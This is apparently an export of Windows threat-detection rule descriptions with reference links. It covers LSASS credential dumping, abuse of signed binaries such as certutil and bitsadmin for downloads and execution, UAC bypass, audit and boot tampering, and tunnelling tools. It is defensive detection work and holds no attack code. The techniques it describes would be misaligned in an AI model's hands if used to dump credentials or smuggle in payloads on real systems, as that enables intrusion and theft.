https://web.archive.org/web/20230329170326/https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md, https://research.splunk.com/endpoint/windows_possible_credential_dumping/ |
Credential Dumping Activity By Python Based Tool |
Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz. |
https://twitter.com/bh4b3sh/status/1303674603819081728, https://github.com/skelsec/pypykatz |
Remote LSASS Process Access Through Windows Remote Management |
Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz. |
https://pentestlab.blog/2018/05/15/lateral-movement-winrm/ |
Suspicious LSASS Access Via MalSecLogon |
Detects suspicious access to LSASS handle via a call trace to "seclogon.dll" with a suspicious access right. |
https://twitter.com/SBousseaden/status/1541920424635912196, https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml, https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html |
Potentially Suspicious GrantedAccess Flags On LSASS |
Detects process access requests to LSASS process with potentially suspicious access flags |
https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights, https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf |
Credential Dumping Attempt Via WerFault |
Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up. |
https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507 |
LSASS Access From Potentially White-Listed Processes |
Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference
|
https://twitter.com/_xpn_/status/1491557187168178176, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz, https://twitter.com/mrd0x/status/1460597833917251595 |
Uncommon Process Access Rights For Target Image |
Detects process access request to uncommon target images with a "PROCESS_ALL_ACCESS" access mask.
|
https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights |
Potential Direct Syscall of NtOpenProcess |
Detects potential calls to NtOpenProcess directly from NTDLL. |
https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6 |
Credential Dumping Attempt Via Svchost |
Detects when a process tries to access the memory of svchost to potentially dump credentials. |
Internal Research |
Suspicious Svchost Process Access |
Detects suspicious access to the "svchost" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service. |
https://github.com/hlldz/Invoke-Phant0m, https://twitter.com/timbmsft/status/900724491076214784 |
Function Call From Undocumented COM Interface EditionUpgradeManager |
Detects function calls from the EditionUpgradeManager COM interface. Which is an interface that is not used by standard executables. |
https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/, https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611 |
UAC Bypass Using WOW64 Logger DLL Hijack |
Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30) |
https://github.com/hfiref0x/UACME |
Compress Data and Lock With Password for Exfiltration With 7-ZIP |
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md |
7Zip Compressing Dump Files |
Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. |
https://thedfirreport.com/2022/09/26/bumblebee-round-two/ |
Potential DLL Injection Via AccCheckConsole |
Detects the execution "AccCheckConsole" a command-line tool for verifying the accessibility implementation of an application's UI.
One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc.
The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility.
|
https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340, https://twitter.com/bohops/status/1477717351017680899?s=12, https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/ |
Suspicious AddinUtil.EXE CommandLine Execution |
Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
|
https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html |
Uncommon Child Process Of AddinUtil.EXE |
Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
|
https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html |
Uncommon AddinUtil.EXE CommandLine Execution |
Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
|
https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html |
AddinUtil.EXE Execution From Uncommon Directory |
Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory. |
https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html |
Potential Adplus.EXE Abuse |
Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands. |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/, https://twitter.com/nas_bench/status/1534916659676422152, https://twitter.com/nas_bench/status/1534915321856917506 |
AgentExecutor PowerShell Execution |
Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument |
https://twitter.com/lefterispan/status/1286259016436514816, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/, https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension, https://twitter.com/jseerden/status/1247985304667066373/photo/1 |
Suspicious AgentExecutor PowerShell Execution |
Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument |
https://twitter.com/lefterispan/status/1286259016436514816, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/, https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension, https://twitter.com/jseerden/status/1247985304667066373/photo/1 |
Uncommon Child Process Of Appvlp.EXE |
Detects uncommon child processes of Appvlp.EXE
Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands.
Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder
or to mark a file as a system file.
|
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/ |
AspNetCompiler Execution |
Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code. |
https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/, https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ |
Suspicious Child Process of AspNetCompiler |
Detects potentially suspicious child processes of "aspnet_compiler.exe". |
https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/, https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ |
Potentially Suspicious ASP.NET Compilation Via AspNetCompiler |
Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation. |
https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/, https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ |
Uncommon Assistive Technology Applications Execution Via AtBroker.EXE |
Detects the start of a non built-in assistive technology applications via "Atbroker.EXE". |
http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/, https://lolbas-project.github.io/lolbas/Binaries/Atbroker/ |
Hiding Files with Attrib.exe |
Detects usage of attrib.exe to hide files from users. |
https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/, https://www.uptycs.com/blog/lolbins-are-no-laughing-matter |
Set Suspicious Files as System Files Using Attrib.EXE |
Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs
|
https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4, https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0, https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/ |
Interactive AT Job |
Detects an interactive AT job, which may be used as a form of privilege escalation. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md, https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html |
Audit Policy Tampering Via NT Resource Kit Auditpol |
Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.
This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
|
https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol |
Audit Policy Tampering Via Auditpol |
Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.
This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
|
https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ |
Indirect Inline Command Execution Via Bash.EXE |
Detects execution of Microsoft bash launcher with the "-c" flag.
This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
|
https://lolbas-project.github.io/lolbas/Binaries/Bash/ |
Indirect Command Execution From Script File Via Bash.EXE |
Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly.
This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
|
https://lolbas-project.github.io/lolbas/Binaries/Bash/, https://linux.die.net/man/1/bash, Internal Research |
Boot Configuration Tampering Via Bcdedit.EXE |
Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md, https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html |
Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE |
Detects potential malicious and unauthorized usage of bcdedit.exe |
https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set, https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2 |
Data Export From MSSQL Table Via BCP.EXE |
Detects the execution of the BCP utility in order to export data from the database.
Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file.
|
https://docs.microsoft.com/en-us/sql/tools/bcp-utility, https://asec.ahnlab.com/en/61000/, https://asec.ahnlab.com/en/78944/, https://www.huntress.com/blog/attacking-mssql-servers, https://www.huntress.com/blog/attacking-mssql-servers-pt-ii, https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/, https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/ |
Suspicious Child Process Of BgInfo.EXE |
Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/, https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ |
BitLockerTogo.EXE Execution |
Detects the execution of "BitLockerToGo.EXE".
BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system.
This is a rarely used application and usage of it at all is worth investigating.
Malware such as Lumma stealer has been seen using this process as a target for process hollowing.
|
https://tria.ge/240521-ynezpagf56/behavioral1, https://any.run/report/6eea2773c1b4b5c6fb7c142933e220c96f9a4ec89055bf0cf54accdcde7df535/a407f006-ee45-420d-b576-f259094df091, https://bazaar.abuse.ch/sample/8c75f8e94486f5bbf461505823f5779f328c5b37f1387c18791e0c21f3fdd576/, https://bazaar.abuse.ch/sample/64e6605496919cd76554915cbed88e56fdec10dec6523918a631754664b8c8d3/ |
Uncommon Child Process Of BgInfo.EXE |
Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/, https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ |
Suspicious Download From Direct IP Via Bitsadmin |
Detects usage of bitsadmin downloading a file using an URL that contains an IP |
https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ |
File Download Via Bitsadmin |
Detects usage of bitsadmin downloading a file |
https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ |
Suspicious Download From File-Sharing Website Via Bitsadmin |
Detects usage of bitsadmin downloading a file from a suspicious domain |
https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker, https://www.cisa.gov/uscert/ncas/alerts/aa22-321a, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/ |
File With Suspicious Extension Downloaded Via Bitsadmin |
Detects usage of bitsadmin downloading a file with a suspicious extension |
https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ |
File Download Via Bitsadmin To A Suspicious Target Folder |
Detects usage of bitsadmin downloading a file to a suspicious target folder |
https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ |
File Download Via Bitsadmin To An Uncommon Target Folder |
Detects usage of bitsadmin downloading a file to uncommon target folder |
https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ |
Monitoring For Persistence Via BITS |
BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished.
When the job runs on the system the command specified in the BITS job will be executed.
This can be abused by actors to create a backdoor within the system and for persistence.
It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.
|
https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html, http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html, https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394 |
Potential Data Stealing Via Chromium Headless Debugging |
Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control |
https://github.com/defaultnamehere/cookie_crimes/, https://mango.pdf.zone/stealing-chrome-cookies-without-a-password, https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/, https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/ |
Browser Execution In Headless Mode |
Detects execution of Chromium based browser in headless mode |
https://twitter.com/mrd0x/status/1478234484881436672?s=12, https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html |
File Download with Headless Browser |
Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files |
https://twitter.com/mrd0x/status/1478234484881436672?s=12, https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html |
Chromium Browser Instance Executed With Custom Extension |
Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension |
https://redcanary.com/blog/chromeloader/, https://emkc.org/s/RJjuLa, https://www.mandiant.com/resources/blog/lnk-between-browsers |
Chromium Browser Headless Execution To Mockbin Like Site |
Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data). |
https://www.zscaler.com/blogs/security-research/steal-it-campaign |
Suspicious Chromium Browser Instance Executed With Custom Extension |
Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension |
https://redcanary.com/blog/chromeloader/, https://emkc.org/s/RJjuLa, https://www.mandiant.com/resources/blog/lnk-between-browsers |
File Download From Browser Process Via Inline URL |
Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state. |
https://twitter.com/mrd0x/status/1478116126005641220, https://lolbas-project.github.io/lolbas/Binaries/Msedge/ |
Browser Started with Remote Debugging |
Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks |
https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf, https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/, https://github.com/defaultnamehere/cookie_crimes/, https://github.com/wunderwuzzi23/firefox-cookiemonster |
Tor Client/Browser Execution |
Detects the use of Tor or Tor-Browser to connect to onion routing networks |
https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/ |
Suspicious Calculator Usage |
Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
|
https://twitter.com/ItsReallyNick/status/1094080242686312448 |
Potential Binary Proxy Execution Via Cdb.EXE |
Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/, https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html, https://twitter.com/nas_bench/status/1534957360032120833 |
New Root Certificate Installed Via CertMgr.EXE |
Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system.
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md, https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/ |
File Download via CertOC.EXE |
Detects when a user downloads a file by using CertOC.exe |
https://lolbas-project.github.io/lolbas/Binaries/Certoc/ |
File Download From IP Based URL Via CertOC.EXE |
Detects when a user downloads a file from an IP based URL using CertOC.exe |
https://lolbas-project.github.io/lolbas/Binaries/Certoc/ |
DLL Loaded via CertOC.EXE |
Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. |
https://twitter.com/sblmsrsn/status/1445758411803480072?s=20, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2, https://lolbas-project.github.io/lolbas/Binaries/Certoc/ |
Suspicious DLL Loaded via CertOC.EXE |
Detects when a user installs certificates by using CertOC.exe to load the target DLL file. |
https://twitter.com/sblmsrsn/status/1445758411803480072?s=20, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2, https://lolbas-project.github.io/lolbas/Binaries/Certoc/ |
New Root Certificate Installed Via Certutil.EXE |
Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system.
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md |
File Decoded From Base64/Hex Via Certutil.EXE |
Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/, https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/, https://twitter.com/JohnLaTwC/status/835149808817991680, https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil, https://lolbas-project.github.io/lolbas/Binaries/Certutil/ |
Suspicious Download Via Certutil.EXE |
Detects the execution of certutil with certain flags that allow the utility to download files. |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://forensicitguy.github.io/agenttesla-vba-certutil-download/, https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/, https://twitter.com/egre55/status/1087685529016193025, https://lolbas-project.github.io/lolbas/Binaries/Certutil/ |
Suspicious File Downloaded From Direct IP Via Certutil.EXE |
Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs. |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://forensicitguy.github.io/agenttesla-vba-certutil-download/, https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/, https://twitter.com/egre55/status/1087685529016193025, https://lolbas-project.github.io/lolbas/Binaries/Certutil/, https://twitter.com/_JohnHammond/status/1708910264261980634 |
Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE |
Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites. |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://forensicitguy.github.io/agenttesla-vba-certutil-download/, https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/, https://twitter.com/egre55/status/1087685529016193025, https://lolbas-project.github.io/lolbas/Binaries/Certutil/, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/ |
File Encoded To Base64 Via Certutil.EXE |
Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/, https://lolbas-project.github.io/lolbas/Binaries/Certutil/ |
Potential NTLM Coercion Via Certutil.EXE |
Detects possible NTLM coercion via certutil using the 'syncwithWU' flag |
https://github.com/LOLBAS-Project/LOLBAS/issues/243 |
Suspicious File Encoded To Base64 Via Certutil.EXE |
Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious |
https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior, https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior, https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior, https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior |
File In Suspicious Location Encoded To Base64 Via Certutil.EXE |
Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations |
https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior, https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior, https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior, https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior |
Certificate Exported Via Certutil.EXE |
Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates. |
https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html |
Suspicious CodePage Switch Via CHCP |
Detects a code page switch in command line or batch scripts to a rare language |
https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers, https://twitter.com/cglyer/status/1183756892952248325 |
Console CodePage Lookup Via CHCP |
Detects use of chcp to look up the system locale value as part of host discovery |
https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/chcp |
Deleted Data Overwritten Via Cipher.EXE |
Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk.
Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.
Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive |
Process Access via TrolleyExpress Exclusion |
Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory |
https://twitter.com/_xpn_/status/1491557187168178176, https://www.youtube.com/watch?v=Ie831jF0bb0 |
Data Copied To Clipboard Via Clip.EXE |
Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications. |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md |
Cloudflared Portable Execution |
Detects the execution of the "cloudflared" binary from a non standard location.
|
https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/, https://github.com/cloudflare/cloudflared, https://www.intrinsec.com/akira_ransomware/, https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/, https://github.com/cloudflare/cloudflared/releases |
Cloudflared Quick Tunnel Execution |
Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB.
The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com.
The tool has been observed in use by threat groups including Akira ransomware.
|
https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/, https://github.com/cloudflare/cloudflared, https://www.intrinsec.com/akira_ransomware/, https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/ |
Cloudflared Tunnel Connections Cleanup |
Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections. |
https://github.com/cloudflare/cloudflared, https://developers.cloudflare.com/cloudflare-one/connections/connect-apps |
Cloudflared Tunnel Execution |
Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks. |
https://blog.reconinfosec.com/emergence-of-akira-ransomware-group, https://github.com/cloudflare/cloudflared, https://developers.cloudflare.com/cloudflare-one/connections/connect-apps |
New Generic Credentials Added Via Cmdkey.EXE |
Detects usage of "cmdkey.exe" to add generic credentials.
As an example, this can be used before connecting to an RDP session via command line interface.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol |
Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE |
Detects usage of cmdkey to look for cached credentials on the system |
https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation, https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx, https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1003.005/T1003.005.md#atomic-test-1---cached-credential-dump-via-cmdkey |
Change Default File Association Via Assoc |
Detects file association changes using the builtin "assoc" command.
When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md |
Potential Arbitrary File Download Via Cmdl32.EXE |
Detects execution of Cmdl32 with the "/vpn" and "/lan" flags.
